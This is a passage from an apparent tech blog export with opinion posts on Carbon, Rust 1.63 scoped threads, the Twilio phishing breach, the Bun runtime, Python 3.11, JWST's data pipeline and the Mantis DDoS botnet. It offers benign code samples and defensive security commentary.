C++26 is shaping up to include reflection and pattern matching.\nEvery time someone proposes replacing C++, a significant portion of the C++ community pushes back. They\u0026rsquo;ve invested decades in mastering the language\u0026rsquo;s complexity, and they see incremental standards evolution as the path forward. Carbon needs to convince these developers that a clean break (even with interop) is worth the transition cost.\nThe C++ committee process is slow, yes, but it\u0026rsquo;s slow for reasons — backward compatibility, portability across dozens of platforms and compilers, consensus among hundreds of stakeholders. Carbon will eventually face similar pressures if it achieves adoption at scale.\nMy Take # I\u0026rsquo;m cautiously interested but not holding my breath. The interoperability story, if they can deliver it, addresses a genuine pain point that Rust doesn\u0026rsquo;t fully solve. But the project is so early that evaluating it seriously feels premature — there isn\u0026rsquo;t even a self-hosting compiler yet.\nMy pragmatic advice: if you\u0026rsquo;re starting a new systems programming project today, Rust is the proven choice with a mature ecosystem, excellent tooling, and a growing community. If you\u0026rsquo;re maintaining a large C++ codebase and dreaming about incremental modernization, keep an eye on Carbon, but don\u0026rsquo;t plan around it yet.\nThe systems programming space is healthier than it\u0026rsquo;s been in decades. Whether Carbon succeeds or not, the pressure it puts on C++ to modernize faster is a net positive. Competition drives improvement, and C++ developers deserve better ergonomics regardless of which language delivers them.\n","date":"18 August 2022","externalUrl":null,"permalink":"/posts/220818-google-carbon-language/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google announced Carbon as an experimental successor to C++. 
After the initial hype settles, what does this mean for the systems programming landscape?","title":"Google's Carbon Language — A Successor to C++ or Just Another Experiment?","type":"posts"},{"content":"Rust 1.63 landed today, and while the release might not generate the same headlines as a new language announcement, it contains something that Rust developers have been waiting years for: stabilized scoped threads. Rust has been steadily gaining adoption in systems programming circles. If you\u0026rsquo;ve ever fought with the borrow checker trying to share a reference across std::thread::spawn, you know exactly why this matters.\nThe std::thread::scope API lets you spawn threads that can borrow data from their parent\u0026rsquo;s stack frame — safely, without 'static lifetime requirements, and without wrapping everything in Arc\u0026lt;Mutex\u0026lt;T\u0026gt;\u0026gt;. It\u0026rsquo;s the kind of feature that makes you wonder how you ever lived without it.\nWhat Scoped Threads Actually Solve # In standard Rust, when you spawn a thread with std::thread::spawn, the closure you pass must own all its data or use references with a 'static lifetime. This is a safety guarantee — the spawned thread might outlive the scope where the data lives, so the compiler rightfully refuses to let you dangle references.\nIn practice, this means a lot of code like this:\nlet data = vec![1, 2, 3, 4, 5]; let data = Arc::new(data); let data_clone = Arc::clone(\u0026amp;data); let handle = thread::spawn(move || { // use data_clone println!(\u0026#34;{:?}\u0026#34;, data_clone); }); handle.join().unwrap(); With scoped threads, the same code becomes:\nlet data = vec![1, 2, 3, 4, 5]; thread::scope(|s| { s.spawn(|| { println!(\u0026#34;{:?}\u0026#34;, \u0026amp;data); }); }); // all threads are joined here The scope guarantees that all spawned threads complete before the scope exits, which means the compiler can prove that data will outlive all the threads that reference it. 
No Arc, no cloning, no lifetime annotations. Just\u0026hellip; references that work.\nWhy This Took So Long # Scoped threads aren\u0026rsquo;t a new concept in the Rust ecosystem. The crossbeam crate has provided crossbeam::scope for years, and it\u0026rsquo;s been one of the most widely used concurrency utilities in the ecosystem. The standard library version has been in development since RFC 3151, and the path to stabilization involved carefully getting the API ergonomics and safety guarantees right. This represents the kind of incremental language improvement that makes Rust production-ready.\nThe tricky part is handling panics. If a scoped thread panics, the scope needs to ensure all other threads are still joined before propagating the panic. The implementation also needs to guarantee that thread-local destructors run in the right order and that no references escape the scope through clever lifetime tricks.\nThis is quintessential Rust: a feature that seems straightforward on the surface but requires meticulous attention to edge cases to maintain the language\u0026rsquo;s safety guarantees. The crossbeam version went through several iterations dealing with soundness issues, and the standard library team benefited enormously from those lessons learned.\nPractical Impact for Real-World Code # Where I see this making the biggest difference is in data processing pipelines — the kind of code where you have a large dataset on the stack and want to process chunks in parallel. 
Before scoped threads, the ergonomic choice was often rayon\u0026rsquo;s parallel iterators, which are great but sometimes more abstraction than you need.\nConsider a scenario where you\u0026rsquo;re processing a batch of files and collecting results:\nlet mut results = Vec::new(); thread::scope(|s| { let handles: Vec\u0026lt;_\u0026gt; = files.iter().map(|file| { s.spawn(move || process_file(file)) }).collect(); for handle in handles { results.push(handle.join().unwrap()); } }); Clean, safe, and free of unnecessary allocations. The move keyword copies each file reference into its closure instead of borrowing the short-lived loop variable, which the compiler would reject. The mutable reference to results stays in the parent scope, and the immutable references to files are safely shared across threads.\nFor those of us who work on performance-sensitive backend services, this is a meaningful quality-of-life improvement. I\u0026rsquo;ve been using crossbeam::scope in production code for a while, but having it in std means one fewer dependency and a clearer signal to the ecosystem about the idiomatic way to handle this pattern. Features like this cement Rust\u0026rsquo;s position in systems programming alongside C and C++.\nAlso in 1.63: Owned File Descriptors # Worth mentioning that this release also stabilizes I/O safety through OwnedFd, BorrowedFd, and friends. These types bring Rust\u0026rsquo;s ownership model to file descriptors, preventing a class of bugs where you accidentally close a file descriptor that\u0026rsquo;s still in use elsewhere, or use one that\u0026rsquo;s already been closed.\nIt\u0026rsquo;s less flashy than scoped threads, but it\u0026rsquo;s another example of Rust gradually closing gaps where unsafe behavior could sneak in through OS-level resources. If you\u0026rsquo;ve ever debugged a file descriptor leak in a long-running service, you\u0026rsquo;ll appreciate this.\nMy Take # Rust\u0026rsquo;s evolution over the past few years has been remarkably disciplined. Rather than chasing flashy features, the team has focused on making the existing model more ergonomic and closing soundness gaps. 
Scoped threads, I/O safety, GATs (coming soon) — these are features that make Rust more pleasant to write without compromising its core promise.\nI\u0026rsquo;ve been writing Rust for production systems alongside Python and Node.js for a few years now, and the language keeps getting better at reducing the \u0026ldquo;fighting the borrow checker\u0026rdquo; friction that newcomers (and honestly, experienced users too) hit regularly. Scoped threads eliminate one of the most common sources of that friction in concurrent code.\nIf you\u0026rsquo;ve been putting off learning Rust because the concurrency story felt too boilerplate-heavy compared to Go\u0026rsquo;s goroutines, this is a good time to take another look. The gap in ergonomics is narrowing, and the safety guarantees you get in return remain unmatched.\n","date":"11 August 2022","externalUrl":null,"permalink":"/posts/220811-rust-163-scoped-threads/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust 1.63 brings scoped threads to stable, finally making it ergonomic to share stack references across threads without Arc or cloning.","title":"Rust 1.63 Stabilizes Scoped Threads — A Quiet Revolution in Safe Concurrency","type":"posts"},{"content":"This week, Twilio — the company that essentially is the plumbing for SMS communications across thousands of apps — disclosed that attackers successfully phished their employees and gained access to internal systems. If you\u0026rsquo;re a developer who\u0026rsquo;s ever called twilio.messages.create(), this one should have your attention.\nThe breach didn\u0026rsquo;t exploit some clever zero-day. It was a well-crafted phishing campaign targeting Twilio employees with SMS messages that impersonated the company\u0026rsquo;s IT department. The messages directed employees to a fake login page, captured their credentials, and the attackers walked right in. 
Simple, effective, devastating.\nThe Irony of an SMS Company Being Phished via SMS # There\u0026rsquo;s a painful irony here that\u0026rsquo;s hard to ignore. Twilio, the company that powers SMS-based two-factor authentication for a massive portion of the internet, was itself compromised through a text message attack. It\u0026rsquo;s like a locksmith getting their shop broken into because they left the key under the doormat.\nThe attackers reportedly accessed data for a limited number of customer accounts — Twilio says around 125 — but when your customer list includes companies like Okta, Signal, and countless other services, the blast radius extends far beyond what that number suggests. We\u0026rsquo;re looking at a supply chain attack where compromising one communications provider can cascade into dozens of downstream services.\nI\u0026rsquo;ve been in this industry long enough to know that phishing is never truly \u0026ldquo;solved.\u0026rdquo; You can train employees endlessly, run simulations quarterly, and still someone will click on a convincing enough message. The question isn\u0026rsquo;t whether your people will fall for phishing — it\u0026rsquo;s what happens when they do.\nSMS 2FA: The Security Theater We Keep Performing # This breach is another nail in the coffin for SMS-based two-factor authentication. We\u0026rsquo;ve known for years that SMS is a weak second factor — SIM swapping, SS7 vulnerabilities, and now supply chain compromises of the SMS providers themselves. NIST proposed deprecating SMS-based 2FA in a 2016 draft of its digital identity guidelines (the final text classifies it as a restricted authenticator), yet here we are in 2022 and it\u0026rsquo;s still the default for most services.\nThe problem is convenience. SMS is universal. Every phone can receive a text message. You don\u0026rsquo;t need to install an app, buy a hardware key, or understand what TOTP means. 
For product managers trying to balance security with user experience, SMS is the path of least resistance.\nBut \u0026ldquo;least resistance\u0026rdquo; is exactly what attackers are counting on. When the company providing your SMS 2FA gets breached, your second factor becomes your weakest factor.\nIf you\u0026rsquo;re building authentication flows today, please consider:\nTOTP apps (Google Authenticator, Authy) as the minimum standard WebAuthn/FIDO2 hardware keys for anything handling sensitive data Passkeys — the FIDO Alliance and platform vendors are pushing hard on these, and they might finally make phishing-resistant auth usable for normal humans The Bigger Picture: Identity Provider Trust Chains # What concerns me most about this breach isn\u0026rsquo;t the specific data that was accessed. It\u0026rsquo;s the pattern. We\u0026rsquo;re building increasingly complex trust chains where a handful of providers — Twilio for SMS, Okta for identity, Cloudflare for networking — form the foundation for thousands of applications.\nWhen Okta was breached earlier this year through the Lapsus$ group\u0026rsquo;s attack on a third-party support contractor, it showed the same vulnerability pattern. These identity and communications providers are high-value targets precisely because compromising them gives attackers leverage across the entire ecosystem.\nAs engineers, we need to think about these trust dependencies the same way we think about single points of failure in our infrastructure. If your authentication flow depends entirely on Twilio delivering an SMS code, what\u0026rsquo;s your fallback? If your SSO provider gets compromised, how quickly can you rotate credentials and revoke sessions?\nMy Take # I\u0026rsquo;ve been integrating Twilio APIs since before they went public, and I still think they\u0026rsquo;re excellent at what they do. 
But this breach is a reminder that no provider is immune, and building resilient systems means assuming any single component can be compromised.\nThe industry needs to accelerate the move away from SMS as an authentication factor. Not next year, not \u0026ldquo;when passkeys are more mature\u0026rdquo; — now. Every new project I start uses WebAuthn or TOTP as the primary second factor, with SMS only as a last-resort fallback that I\u0026rsquo;d honestly rather not offer at all.\nThe attack itself was embarrassingly simple. The defense doesn\u0026rsquo;t have to be complicated either. Hardware keys, phishing-resistant protocols, and zero-trust architectures that limit blast radius when (not if) a breach occurs. We have the tools. We just need the will to deploy them.\n","date":"4 August 2022","externalUrl":null,"permalink":"/posts/220804-twilio-phishing-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Twilio’s breach through a sophisticated phishing attack targeting employees raises hard questions about SMS-based authentication and supply chain trust.","title":"Twilio's Phishing Breach — Why SMS-Based 2FA Is Living on Borrowed Time","type":"posts"},{"content":"A new JavaScript runtime called Bun dropped earlier this month, and the benchmarks are causing quite a stir. Created by Jarred Sumner, Bun isn\u0026rsquo;t just another Node.js alternative — it\u0026rsquo;s an audaciously ambitious project that aims to be a runtime, bundler, transpiler, and package manager all in one. And the performance numbers, if they hold up in real-world use, are genuinely remarkable: HTTP serving 3-4x faster than Node.js, package installation orders of magnitude faster than npm. After spending a few weeks kicking the tires, I have thoughts.\nWhat Bun Actually Is # At its core, Bun is a JavaScript/TypeScript runtime built on Apple\u0026rsquo;s JavaScriptCore engine (the same one that powers Safari) rather than V8 (which powers Node.js and Deno). 
It\u0026rsquo;s written in Zig, a systems language that gives fine-grained control over memory and performance — a choice that\u0026rsquo;s unusual but increasingly popular for infrastructure tools.\nThe decision to use JavaScriptCore is interesting. V8 gets most of the attention and engineering investment thanks to Chrome\u0026rsquo;s market share, but JSC has its own performance characteristics. It tends to start faster and use less memory at the cost of slightly lower peak throughput in some scenarios. For server-side JavaScript, where startup time and memory efficiency matter, those trade-offs can be favorable.\nBut Bun\u0026rsquo;s ambitions go well beyond the runtime. It includes:\nA bundler that\u0026rsquo;s reportedly 1.8x faster than esbuild (itself written in Go for speed) A transpiler that handles TypeScript and JSX natively without configuration A package manager compatible with npm\u0026rsquo;s registry but dramatically faster A test runner with Jest-compatible API Native support for .env files, SQLite, and hot reloading It\u0026rsquo;s essentially trying to be the entire JavaScript toolchain in a single binary.\nThe Performance Story # The headline numbers are eye-catching. Bun\u0026rsquo;s HTTP server benchmarks show throughput of over 100,000 requests per second for simple workloads — roughly 3-4x what Node.js achieves. The bun install package manager claims to be 20-100x faster than npm install, completing installations in seconds that npm takes minutes for.\nHow real are these numbers? The HTTP benchmarks test a specific workload (simple request-response) that plays to Bun\u0026rsquo;s strengths. In production, your server is doing database queries, template rendering, and business logic — the runtime overhead becomes a smaller portion of total request time. The package installation speed is more straightforwardly impressive: Bun uses a global module cache with hardlinks, meaning it doesn\u0026rsquo;t copy files for each project. 
It\u0026rsquo;s a fundamentally different approach to dependency management.\nI ran some of my own benchmarks with a more realistic Express-style application (Bun implements much of the Node.js API, so existing code often works). The speedup was real but more modest — roughly 1.5-2x for typical request handling. Still significant, but not the 4x the headline benchmarks suggest. This is completely normal for benchmarks versus real-world workloads, and it\u0026rsquo;s not a knock against Bun.\nThe Compatibility Question # Here\u0026rsquo;s where it gets complicated. Bun aims for Node.js compatibility, implementing node:fs, node:path, and many other built-in modules. But \u0026ldquo;compatible\u0026rdquo; and \u0026ldquo;identical\u0026rdquo; are different things. The JavaScript runtime ecosystem will keep evolving as Bun matures. The Node.js API surface is enormous, accumulated over 13 years of development, and Bun\u0026rsquo;s implementation has gaps.\nIn my testing, simple Express applications ran fine. Fastify worked with minor issues. But more complex applications that depend on specific Node.js behaviors — stream semantics, certain crypto operations, native addons compiled against V8\u0026rsquo;s C++ API — hit walls. This is expected for a project this young, but it means you can\u0026rsquo;t simply s/node/bun/ in your production deployment.\nThe npm compatibility is similarly impressive but incomplete. Most packages install correctly, but those with native compilation steps or complex postinstall scripts can fail. These concerns mirror broader JavaScript supply chain security considerations that have become more critical over time. If your project has a clean JavaScript dependency tree, Bun\u0026rsquo;s package manager is a legitimate quality-of-life improvement today.\nZig: The Unlikely Foundation # Bun\u0026rsquo;s use of Zig as its implementation language deserves attention. 
Zig is a relatively obscure systems language designed as a \u0026ldquo;better C\u0026rdquo; — it provides manual memory management with safety guardrails, comptime (compile-time) code execution, and excellent C interop. It\u0026rsquo;s not garbage collected, which is partly why Bun can achieve its performance numbers.\nJarred Sumner has been vocal about Zig enabling optimizations that would be difficult or impossible in languages with garbage collection. This systems-level approach mirrors how Rust maintains momentum in infrastructure projects. The ability to control memory layout precisely, avoid allocation in hot paths, and use SIMD instructions directly gives Bun\u0026rsquo;s internals a performance profile closer to C than to Go or Rust. Whether Zig\u0026rsquo;s relative obscurity becomes a barrier to community contributions remains to be seen.\nWhere Does This Leave Deno? # The JavaScript runtime landscape is getting crowded. Node.js remains the incumbent with an enormous ecosystem. Deno, Ryan Dahl\u0026rsquo;s \u0026ldquo;do-over\u0026rdquo; with TypeScript support and better security defaults, has been gaining traction since its 1.0 release in 2020. Now Bun enters with a performance-first pitch.\nEach has a different value proposition: Node.js offers ecosystem maturity, Deno offers security and standards compliance, and Bun offers raw speed and integrated tooling. I suspect the market is large enough for all three, with Bun initially finding its niche in scenarios where performance is the primary concern — serverless functions, API gateways, and high-throughput microservices.\nMy Take # Bun is the most exciting thing to happen to the JavaScript server ecosystem in years. Even if you never use Bun in production, its existence puts competitive pressure on Node.js and Deno to improve performance and developer experience. Competition is healthy.\nThat said, I\u0026rsquo;d pump the brakes on production adoption. 
Bun is pre-1.0, the compatibility gaps are real, and single-maintainer projects carry bus-factor risk regardless of how talented the maintainer is. Use it for scripts, development tooling, and side projects. Benchmark it against your actual workload. But keep your production Node.js deployments for now.\nThe JavaScript ecosystem\u0026rsquo;s greatest strength has always been its willingness to reinvent itself. Bun is the latest expression of that impulse, and based on what I\u0026rsquo;ve seen so far, it deserves the attention it\u0026rsquo;s getting.\n","date":"28 July 2022","externalUrl":null,"permalink":"/posts/220728-bun-javascript-runtime-shakes-up-ecosystem/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Bun, a new JavaScript runtime built on JavaScriptCore and written in Zig, is making waves with extraordinary benchmark numbers. Is it the Node.js challenger we’ve been waiting for?","title":"Bun Enters the Ring — A New JavaScript Runtime Challenges Node","type":"posts"},{"content":"Python 3.11 is currently in beta, with the final release targeted for October, and the benchmarks are turning heads. The Faster CPython project, led by Mark Shannon and backed by Microsoft (who hired Shannon and Guido van Rossum specifically for this), is delivering on its promise: CPython 3.11 is showing 10-60% speedups across the standard benchmark suite, with an average improvement of around 25%. For a language often criticized for its speed, this is significant.\nThe Faster CPython Initiative # To understand why this matters, you need the context. Python has always traded raw performance for developer productivity, and for most of its history, the core team accepted that trade-off. If you needed speed, you\u0026rsquo;d drop to C extensions, use NumPy, or reach for Cython. 
The language\u0026rsquo;s interpreted, dynamically-typed nature was considered an inherent performance ceiling.\nThe Faster CPython project, documented in PEP 659, takes a different approach. Rather than accepting the overhead as inevitable, the team is implementing a specializing adaptive interpreter — a technique that sits between traditional interpretation and full JIT compilation.\nThe core idea: CPython now monitors the types that flow through bytecode instructions at runtime. When it detects that an operation consistently handles the same types (say, integer addition), it replaces the generic instruction with a specialized version optimized for that specific case. If the assumption breaks, it falls back to the generic path. This is a form of inline caching that\u0026rsquo;s been used in JavaScript engines like V8 for years, but it\u0026rsquo;s new for CPython.\nWhat\u0026rsquo;s Actually Faster # The improvements aren\u0026rsquo;t evenly distributed, and that\u0026rsquo;s important to understand. The biggest gains are in:\nFunction calls and returns: Python\u0026rsquo;s function call overhead has been significantly reduced. Frame objects are now lazily created, and the function call mechanism has been streamlined. This matters enormously because Python code is heavily function-call driven compared to languages with more inline optimization.\nAttribute access: Looking up attributes on objects — something Python does constantly — is now cached more aggressively. 
If obj.method resolved to the same method last time, the interpreter takes a fast path.\nArithmetic operations: Integer and float operations between common types now hit specialized fast paths instead of going through the generic type dispatch mechanism.\nStartup time: There are improvements to how modules are imported and initialized, though startup remains an area with room for growth.\nWhat\u0026rsquo;s less improved: I/O-bound code (obviously — you can\u0026rsquo;t make the network faster), code that spends most of its time in C extensions (NumPy-heavy workloads are already fast), and code with extremely dynamic type patterns that prevent specialization.\nBetter Error Messages # Performance isn\u0026rsquo;t the only story in 3.11. The error messages have received a substantial upgrade that I think will have an outsized impact on developer experience, especially for newcomers.\nPython 3.11 now shows precise error locations within expressions. Instead of pointing at an entire line, tracebacks highlight exactly which part of an expression caused the error:\nTraceback (most recent call last): File \u0026#34;example.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; result = data[\u0026#34;users\u0026#34;][0][\u0026#34;name\u0026#34;].upper() ~~~~~~~~~~~~~~~~~~~~^^^^^^ TypeError: \u0026#39;NoneType\u0026#39; object is not subscriptable That ~~~~ and ^^^^^^ precisely indicating which operation failed? That\u0026rsquo;s going to save developers countless hours of debugging. I\u0026rsquo;ve lost track of how many times I\u0026rsquo;ve stared at a long chained expression in a traceback trying to figure out which part was None. This is a genuinely user-centric improvement.\nException Groups and TaskGroups # Python 3.11 also introduces Exception Groups (PEP 654), a new mechanism for raising and handling multiple exceptions simultaneously. 
This is directly motivated by the async programming model — when you\u0026rsquo;re running concurrent tasks, multiple failures can occur simultaneously, and the current exception model can only represent one at a time.\nThe new except* syntax allows handling specific exception types from a group while letting others propagate:\ntry: async with asyncio.TaskGroup() as tg: tg.create_task(operation_a()) tg.create_task(operation_b()) except* ValueError as eg: handle_value_errors(eg.exceptions) except* OSError as eg: handle_os_errors(eg.exceptions) TaskGroup itself is a new asyncio primitive that replaces the somewhat clunky gather() pattern. It provides structured concurrency — all tasks in the group are properly awaited, and if one fails, the others are cancelled. This is a pattern that Trio popularized, and it\u0026rsquo;s great to see it making its way into the standard library.\nThe Broader Implications # What excites me most about the Faster CPython project isn\u0026rsquo;t the 3.11 numbers — it\u0026rsquo;s the trajectory. The team has published a roadmap targeting a 5x speedup over several releases. 3.11 is the first step, and if they maintain this pace, Python\u0026rsquo;s performance story changes fundamentally.\nThere\u0026rsquo;s also a compounding effect. As CPython gets faster, the threshold at which you\u0026rsquo;d reach for C extensions or an alternative language rises. Code that currently needs Cython for acceptable performance might run fine on pure Python in a few releases. This simplifies deployment, reduces maintenance burden, and makes the ecosystem more accessible.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and the language has never felt more vital. 
The combination of performance improvements, better error messages, and structured concurrency support shows a project that\u0026rsquo;s listening to its users and investing in the areas that matter.\nWill Python 3.11 make Python competitive with Go or Rust for performance-sensitive workloads? No, and it shouldn\u0026rsquo;t try to be. But a 25% average speedup means real cost savings on cloud compute, faster test suites, quicker data processing pipelines, and a better experience for developers who choose Python for its productivity advantages.\nIf you\u0026rsquo;re running Python in production, start testing against the 3.11 beta. The compatibility story looks good — the specializing interpreter is an implementation detail that shouldn\u0026rsquo;t affect correctly-written code. October\u0026rsquo;s release is going to be worth the upgrade.\n","date":"21 July 2022","externalUrl":null,"permalink":"/posts/220721-python-311-performance-leap/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.11 is in beta with impressive performance improvements. The Faster CPython project is delivering real results, with benchmarks showing 10-60% speedups.","title":"Python 3.11 Beta — The Fastest CPython Release Yet","type":"posts"},{"content":"On July 12th, NASA released the first full-color images from the James Webb Space Telescope, and they are nothing short of stunning. The deep field image of galaxy cluster SMACS 0723 shows thousands of galaxies in a patch of sky the size of a grain of sand held at arm\u0026rsquo;s length. It\u0026rsquo;s easy to get lost in the wonder — and you should — but as an engineer, I can\u0026rsquo;t help looking at the data pipeline that makes this possible and marveling at that too.\nFrom L2 to Your Screen # JWST sits at the second Lagrange point, roughly 1.5 million kilometers from Earth. That distance creates fascinating constraints. 
Unlike Hubble in low Earth orbit, you can\u0026rsquo;t send a repair mission if something goes wrong. And every byte of data has to travel that distance via radio link.\nThe telescope communicates with Earth through the Deep Space Network (DSN) using a Ka-band high-gain antenna, achieving data rates of up to 28 Mbps. That might sound like a terrible home internet connection, but it\u0026rsquo;s remarkable for a satellite 1.5 million km away. JWST generates roughly 57 GB of science data per day — a manageable volume, but one that needs to be transmitted in scheduled contact windows of about 4 hours, twice daily.\nThe raw data hits the ground at DSN stations in Goldstone (California), Madrid, and Canberra, forming a global network that ensures coverage regardless of Earth\u0026rsquo;s rotation. From there, it\u0026rsquo;s transmitted to the Space Telescope Science Institute (STScI) in Baltimore, which operates the Mikulski Archive for Space Telescopes (MAST).\nThe Calibration Pipeline # What most people see as \u0026ldquo;JWST takes a picture\u0026rdquo; is actually a multi-stage data processing pipeline that would make any DevOps engineer nod in appreciation. The raw detector readouts go through a series of calibration steps that are conceptually similar to a CI/CD pipeline:\nStage 1 — Detector-level corrections: Bias subtraction, dark current removal, linearity correction, saturation flagging. This is essentially noise removal and sensor normalization — each of JWST\u0026rsquo;s detectors has unique characteristics that need to be accounted for.\nStage 2 — Calibrated exposures: Flat fielding, flux calibration, WCS (World Coordinate System) assignment. This transforms raw sensor data into scientifically meaningful measurements with proper coordinates.\nStage 3 — Combined products: Multiple exposures are aligned, cosmic rays are rejected, and final mosaics are produced. 
This is where the deep field images we see actually come together.\nThe entire pipeline is written in Python — specifically the jwst package available on GitHub. It runs on a mix of on-premises infrastructure at STScI and AWS cloud resources. The choice to use Python reflects both the astronomy community\u0026rsquo;s deep investment in the language and the maturity of the scientific Python ecosystem (NumPy, SciPy, Astropy).\nScaling for Science # Here\u0026rsquo;s where it gets interesting from an infrastructure perspective. JWST is expected to operate for at least 10 years (it launched with enough fuel for potentially 20). Over that period, the archive will accumulate petabytes of data. But the raw volume isn\u0026rsquo;t the hard part — it\u0026rsquo;s the reprocessing.\nAs calibration models improve and new understanding of the instruments develops, the entire archive needs to be reprocessed. This is a pattern familiar to anyone working with data pipelines at scale: your processing isn\u0026rsquo;t done once; it\u0026rsquo;s an iterative cycle where improvements to the pipeline mean reprocessing everything. STScI has embraced cloud computing precisely for this burst capacity — spinning up hundreds of instances to reprocess years of observations, then scaling back down.\nThe parallel with modern data engineering is striking. Replace \u0026ldquo;astronomical observations\u0026rdquo; with \u0026ldquo;event streams\u0026rdquo; and \u0026ldquo;calibration pipeline\u0026rdquo; with \u0026ldquo;ETL pipeline,\u0026rdquo; and you have the same architectural challenges: immutable raw data, reproducible processing stages, the need for reprocessing, and burst compute requirements. JWST\u0026rsquo;s data team has essentially built a world-class data lakehouse, just one pointed at the sky.\nOpen Data, Open Source # One of the most admirable aspects of the JWST program is its commitment to open science. 
After a 12-month exclusive access period for the proposing astronomers, all data becomes publicly available through MAST. The calibration pipeline is open source. The data formats use FITS and ASDF (Advanced Scientific Data Format), both open standards.\nThis means anyone with a laptop and Python can download JWST data and process it themselves. The democratization of space science data mirrors what we\u0026rsquo;ve seen in other fields — when you remove barriers to access, you get an explosion of analysis from unexpected directions. Some of the most interesting astronomical discoveries have come from citizen scientists and researchers outside the original observation team.\nMy Take # As engineers, we sometimes get tunnel vision on the problems in our immediate domain. JWST is a reminder that the infrastructure patterns we use daily — data pipelines, cloud burst computing, CI/CD-style processing stages, open-source tooling — are being applied to push the boundaries of human knowledge.\nThe fact that this pipeline runs on Python and AWS, using patterns that any cloud engineer would recognize, speaks to the maturity of our tools. Twenty years ago, this kind of data processing required custom Fortran code on supercomputers. Today, it\u0026rsquo;s Python packages and cloud instances.\nI\u0026rsquo;ve downloaded some of the early release data and started poking around with Astropy. If you\u0026rsquo;ve never worked with astronomical data, I recommend it — it\u0026rsquo;s a fascinating application of the same data engineering skills we use daily, just with a considerably more impressive dataset. The universe is the ultimate big data problem.\n","date":"14 July 2022","externalUrl":null,"permalink":"/posts/220714-jwst-first-images-data-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The James Webb Space Telescope released its first full-color images this week. 
Behind the breathtaking photos is a remarkable data pipeline worth examining.","title":"Webb's First Light — The Data Infrastructure Behind JWST's Images","type":"posts"},{"content":"Cloudflare just disclosed that they mitigated a DDoS attack peaking at 26 million HTTPS requests per second — the largest of its kind ever recorded. The attack, attributed to a botnet they\u0026rsquo;ve dubbed \u0026ldquo;Mantis,\u0026rdquo; targeted a customer using Cloudflare\u0026rsquo;s Free plan. Let that sink in: the largest HTTPS DDoS attack in history, absorbed by a free-tier service. The infrastructure behind that capability is remarkable, but the botnet itself is what keeps me up at night.\nWhy HTTPS DDoS Is Different # Most people hear \u0026ldquo;DDoS\u0026rdquo; and think of volumetric attacks — flooding a target with raw bandwidth. Those are the blunt instruments of the DDoS world, and while they can be massive (we\u0026rsquo;ve seen attacks exceeding 3 Tbps), they\u0026rsquo;re relatively straightforward to mitigate with sufficient network capacity.\nHTTPS DDoS is a fundamentally different beast. Each request requires a TLS handshake, HTTP parsing, and application-layer processing. The computational cost per request is orders of magnitude higher than a simple UDP flood. An attacker generating 26 million HTTPS requests per second isn\u0026rsquo;t just filling pipes — they\u0026rsquo;re exhausting CPU, memory, and connection tables on the target. It\u0026rsquo;s the difference between someone flooding your mailbox with empty envelopes versus sending 26 million certified letters that each require a signature.\nThis is why the Mantis numbers are so alarming. The previous record was around 15.3 million HTTPS rps, set earlier this year. We\u0026rsquo;ve seen a 70% increase in attack capability in just months.\nThe Mantis Botnet Architecture # What makes Mantis particularly interesting — and concerning — is its composition. 
According to Cloudflare\u0026rsquo;s analysis, the botnet operates with approximately 5,000 nodes. That\u0026rsquo;s tiny by botnet standards. Mirai at its peak controlled hundreds of thousands of IoT devices. Mantis achieves its record-breaking output through quality over quantity.\nThe nodes aren\u0026rsquo;t compromised IoT devices with limited compute. They\u0026rsquo;re virtual machines and servers running in cloud data centers, each capable of generating thousands of HTTPS requests per second. These are machines with powerful CPUs, generous memory, and high-bandwidth network connections — the same hardware we use to run production workloads.\nThis represents an evolution in DDoS strategy. Instead of infecting millions of cheap devices, attackers are compromising a smaller number of powerful machines. The economics make sense: a single compromised cloud VM can generate more malicious traffic than thousands of IoT lightbulbs, and it\u0026rsquo;s harder to distinguish from legitimate traffic because it originates from reputable IP ranges.\nCloud Providers as Unwitting Accomplices # The elephant in the room is that cloud providers are effectively hosting the attack infrastructure. These compromised VMs are running in AWS, GCP, Azure, and other platforms, using those providers\u0026rsquo; bandwidth and compute to launch attacks. The attackers get enterprise-grade infrastructure at someone else\u0026rsquo;s expense.\nThis creates an uncomfortable responsibility question. Cloud providers have the technical capability to detect and shut down anomalous outbound traffic patterns. A VM suddenly generating thousands of HTTPS requests per second to a single target is not normal behavior. But implementing automated detection and response at scale is complex, and false positives could impact legitimate customers.\nI\u0026rsquo;ve worked with enough cloud infrastructure to know that egress monitoring is often an afterthought. 
We obsess over ingress security — firewalls, WAFs, intrusion detection — but monitoring what leaves our networks gets far less attention. Mantis is a reminder that compromised infrastructure isn\u0026rsquo;t just a risk to the machine\u0026rsquo;s owner; it\u0026rsquo;s a risk to the entire internet.\nWhat This Means for Defense # If you\u0026rsquo;re running internet-facing services, the implications are straightforward but sobering. Traditional DDoS mitigation that relies on IP reputation and rate limiting is increasingly insufficient. Mantis traffic comes from cloud IP ranges that host millions of legitimate services. You can\u0026rsquo;t simply block AWS or GCP without cutting off real users.\nThe effective defenses are moving up the stack:\nChallenge-based mitigation: CAPTCHAs and JavaScript challenges that are trivial for browsers but expensive for bots Behavioral analysis: Distinguishing human browsing patterns from automated requests Anycast networks: Distributing traffic across global points of presence so no single location is overwhelmed Managed DDoS services: Cloudflare, Akamai, and AWS Shield exist because most organizations can\u0026rsquo;t build this in-house The cost asymmetry is the fundamental problem. Launching an HTTPS DDoS attack from compromised cloud infrastructure is cheap. Defending against it requires significant investment in global infrastructure. This is exactly why managed services make sense for all but the largest organizations.\nMy Take # I\u0026rsquo;ve been watching DDoS evolution for two decades, and Mantis represents a phase shift. We\u0026rsquo;ve moved from script kiddies with IoT botnets to sophisticated operators leveraging cloud infrastructure. The 26 million rps number will be broken — probably within the year.\nThe uncomfortable truth is that our cloud-centric architecture has created the perfect attack platform. 
